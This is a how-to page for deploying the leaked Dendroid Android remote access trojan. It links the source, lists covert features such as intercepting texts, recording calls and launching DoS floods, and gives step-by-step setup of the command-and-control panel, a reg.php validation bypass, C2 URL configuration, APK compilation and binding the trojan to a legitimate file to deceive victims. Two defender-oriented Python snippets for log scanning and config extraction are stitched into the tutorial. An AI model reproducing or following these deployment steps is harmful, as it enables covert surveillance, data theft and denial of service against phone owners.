Dendroid – Android RAT

Dendroid is an HTTP RAT that is marketed as being transparent to the user and firmware interface, having a sophisticated PHP panel, and an application APK binder package.

The seller markets Dendroid as offering many features that have never been seen before, with 24/7 support, all for a one-off payment of $300 to be paid through BTC, LTC, BTC-e, or other services. Some of the many features on offer include the following:

  • Delete call logs
  • Call a phone number
  • Open Web pages
  • Record calls and audio
  • Intercept text messages
  • Take and upload photos and videos
  • Open an application
  • Initiate an HTTP flood (DoS) for a period of time
  • Change the command-and-control (C&C) server

It was first offered on black markets for $300, but after the leak you can get it for free: http://ge.tt/2nSvLv82/v/0. If you prefer open-source tools, you can also use the GitHub link: https://github.com/qqshow/dendroid.

Required:

First you need the Dendroid Source, given above.

Then you need the Android SDK and Eclipse with Android ADT: SDK Tools Only http://developer.android.com/sdk/index.html#Other and Android ADT for Eclipse (Of course you need Eclipse too). Installation of them is explained later.

Finally, you need a web server with PHP and MySQL, for example http://bplaced.net

Setting Up the Web Panel

I will use bplaced.net as an example for setting up the webserver:

  1. Create an Account (The username is the Domain of your Server)
  2. Now You see the control panel of your Webserver
  3. Navigate to http://www.bplaced.net/?handler=mysql and add a MySql database
  4. Now go to phpmyadmin (phpmyadmin.<username>.bplaced.net)
  5. Select your Database on the left side of phpmyadmin and then click on import at the top and add the Sql file located in Dendroid>Dendroid Panel>Other files. This should add the required Tables

Navigate to the Dendroid Panel folder and then to the folder "Panel". Open applysettings.php, blockbot.php, deletebot.php, deletefile.php, deletepics.php, functions.php, table.php, clearawaiting.php and clearmessages.php in the text editor of your choice. In every file you will see $url = "http://pizzachip.com/rat/"; Change this address to the address of your web server, for example: $url = "http://dendroid.bplaced.net";

Open get.php, get-functions.php, new-upload.php and upload-pictures.php, and find the line if($_GET['Password'] == "keylimepie"). Change keylimepie to your database password assigned in Step 3.

Open reg.php and delete its contents. The whole script has to be this:
<?php
$validDomain = "true";
?>

Now check that the files are configured correctly. If they are misconfigured, Dendroid won't work!
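For defenders, the panel file names and the Password query parameter described above make a usable network signature. The following is an added example, not part of the original page or of Dendroid: it scans web proxy or access logs for requests to those scripts, assuming common/combined log format; the sample log lines are constructed.

```python
import re
from posixpath import basename
from urllib.parse import parse_qs, urlsplit

# Panel scripts that, per the page, compare $_GET['Password'] to a shared secret.
GATE_FILES = {"get.php", "get-functions.php", "new-upload.php", "upload-pictures.php"}
DEFAULT_PASSWORD = "keylimepie"  # default value quoted on the page

# Source address and request target from a common/combined log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses, paths and extra parameters are made up.
SAMPLE_LOG = """\
10.0.0.21 - - [01/Jan/2024:10:00:01 +0000] "GET /rat/get.php?Password=keylimepie&id=1 HTTP/1.1" 200 12
10.0.0.22 - - [01/Jan/2024:10:00:05 +0000] "POST /panel/new-upload.php?Password=S3cret HTTP/1.1" 200 0
10.0.0.23 - - [01/Jan/2024:10:00:09 +0000] "GET /get.php?page=2 HTTP/1.1" 200 512
10.0.0.24 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?Password=x HTTP/1.1" 404 0
"""


def find_dendroid_requests(log_text):
    """Return one finding per request that hits a gate script with a Password parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        script = basename(url.path).lower()
        query = parse_qs(url.query, keep_blank_values=True)
        # Both conditions are required: script name alone is too generic.
        if script not in GATE_FILES or "Password" not in query:
            continue
        hits.append({
            "src": m.group("src"),
            "script": script,
            # An unchanged default points at a stock build of the leaked kit.
            "default_password": DEFAULT_PASSWORD in query["Password"],
        })
    return hits


if __name__ == "__main__":
    for hit in find_dendroid_requests(SAMPLE_LOG):
        print(hit)
```

The source address in each finding is the device talking to the panel, which is the handset to pull for triage.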

Upload

If you are sure everything went right, you have to upload the content of the folder Dendroid Panel to your web server. I suggest using FileZilla, which is easy to understand. For example, if you use bplaced, the login credentials are:
Server: <username>.bplaced.net
Username: <username>
Password: Password of your bplaced account
Port: leave the field blank

On the left side you can see your files and on the right side you see the files of your webserver. Delete the Files of your webserver and then copy the content of your Dendroid Panel folder to the webserver.

Dendroid Setup

Navigate in your browser to your webserver <username>.bplaced.net.
You should be greeted with a setup form.
The required Settings:
Database Username: Your username of the Sql Database
Database Password: Your Password of the Sql Database
Database Host: Host of your Sql Database (In bplaced.net: localhost)
Database Name: Your Database name (In bplaced.net: Username of your account)
Bot List Refresh Time & File List Refresh Time & Message Box Refresh Time: Set all to 10
Username: Use the username you want to use for logging in to the control panel
Password: Same for the Password
Bot Offline Time: 10
Time Zone: Is clear, isn't it?
Message Box Font Size: 10

Setting Up the Dendroid Apk

Now you have to open the SDK Manager you downloaded at the start. You can download everything you want, but the important one is API 10.

Set up the ADT for Eclipse. This is a good Tutorial for this: http://www.instructables.com/id/How-To-Setup-Eclipse-for-Android-App-Development/step5/Obtain-Eclipse-IDE/ Follow the instructions till step 9.

Click File > New > Project > Android > Android Project From Existing Code > Next > Browse > Open the path to the Dendroid source then Dendroid Apk > Finish

Click the Drop Down Arrow for Dendroid > src > com.connect > Then click MyService To Open it.

Use base64encode.org to encode your URL and the password of your web server. Change the variables encodedURL and backupURL to your encoded web server URL, but pay attention that you use for example http://dendroid.bplaced.net and not http://dendroid.bplaced.net/

This is required to get Dendroid running.
Paste the encoded Password in the Password Field.
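Because the panel address is only Base64-encoded in encodedURL and backupURL, an analyst can recover it from a decompiled sample in seconds. The following is an added example for malware triage, not part of the original page or of Dendroid's code: the Java-like input is a constructed stand-in for decompiled MyService source, and the hosts in it are placeholders.

```python
import base64
import binascii
import re

CONFIG_NAMES = ("encodedURL", "backupURL")  # variable names given on the page


def _b64(text):
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(text.encode()).decode()


# Constructed stand-in for decompiled com.connect.MyService source (not real Dendroid code).
SAMPLE_SOURCE = f'''
String encodedURL = "{_b64("http://panel.example.test")}";
String backupURL = "{_b64("http://backup.example.test")}";
String label = "not-base64!";
String other = "{_b64("hello world")}";
'''

# name = "literal" where the literal looks like Base64 of a non-trivial length.
ASSIGN_RE = re.compile(r'(\w+)\s*=\s*"([A-Za-z0-9+/]{8,}={0,2})"')


def extract_config(source):
    """Map variable name -> decoded value for literals that look like panel configuration."""
    findings = {}
    for name, literal in ASSIGN_RE.findall(source):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 text, ignore
        # Keep the documented variables, plus any renamed one that decodes to a URL.
        if name in CONFIG_NAMES or decoded.startswith(("http://", "https://")):
            findings[name] = decoded
    return findings


if __name__ == "__main__":
    for name, value in extract_config(SAMPLE_SOURCE).items():
        print(f"{name}: {value}")
```

The recovered hosts can be fed straight into proxy and DNS log searches or block lists.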

Now click on Project > Properties. Here you have to check API level 10 (Android 2.3.3) to get compiling working.

Click on your project in the project Manager on the left side of Eclipse and press F2 to rename the Project to “Dendroid”. Then Click File > Export > Android > Export Android Application > Select Dendroid.

Click OK, then Next. Now check "Create new keystore". The location and the password don't matter. Click Next again, then use anything as the name and password. The validity can be 1000 years. Now you can change the destination of the output APK and finish the compilation.

Now bind the apk to a legitimate file so that the end user will not suspect anything.
You can watch the video tutorial here – https://www.youtube.com/watch?v=FvaCkPQXTWY